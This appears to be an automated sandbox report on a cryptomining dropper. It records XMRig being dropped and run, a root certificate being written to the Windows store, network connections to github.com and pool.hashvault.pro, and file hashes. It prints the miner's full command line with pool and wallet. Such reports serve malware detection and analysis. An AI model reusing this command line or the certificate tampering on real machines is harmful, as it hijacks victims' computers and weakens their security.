memory/3104-60-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-61-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-62-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-63-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-64-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-65-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-66-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-67-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-68-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-69-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-70-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-71-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-72-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-73-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-74-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-75-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-76-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-77-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-78-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-79-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-80-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-81-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-82-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-83-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
memory/3104-84-0x00007FF6FE920000-0x00007FF6FF423000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:27
Platform
win10v2004-20240508-en
Max time kernel
1791s
Max time network
1803s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3336 wrote to memory of 4500 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3336 wrote to memory of 4500 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4500-16-0x0000029FF1E10000-0x0000029FF1E30000-memory.dmp
memory/4500-17-0x0000029FF2070000-0x0000029FF2090000-memory.dmp
memory/4500-18-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-20-0x000002A0861F0000-0x000002A086210000-memory.dmp
memory/4500-19-0x0000029FF2090000-0x0000029FF20B0000-memory.dmp
memory/4500-21-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-22-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-23-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-24-0x0000029FF2090000-0x0000029FF20B0000-memory.dmp
memory/4500-25-0x000002A0861F0000-0x000002A086210000-memory.dmp
memory/4500-26-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-27-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-28-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-29-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-30-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-31-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-32-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-33-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-34-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-35-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-36-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-37-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-38-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-39-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-40-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-41-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-42-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-43-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-44-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-45-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-46-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-47-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-48-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-49-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-50-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-51-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-52-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-53-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-54-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-55-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-56-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-57-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-58-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-59-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-60-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-61-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-62-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-63-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-64-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-65-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-66-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-67-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-68-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-69-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-70-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-71-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-72-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-73-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-74-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-75-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-76-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-77-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-78-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-79-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-80-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-81-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-82-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-83-0x00007FF786680000-0x00007FF787183000-memory.dmp
memory/4500-84-0x00007FF786680000-0x00007FF787183000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-22 14:31
Reported
2024-05-22 15:27
Platform
win10v2004-20240226-en
Max time kernel
1797s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
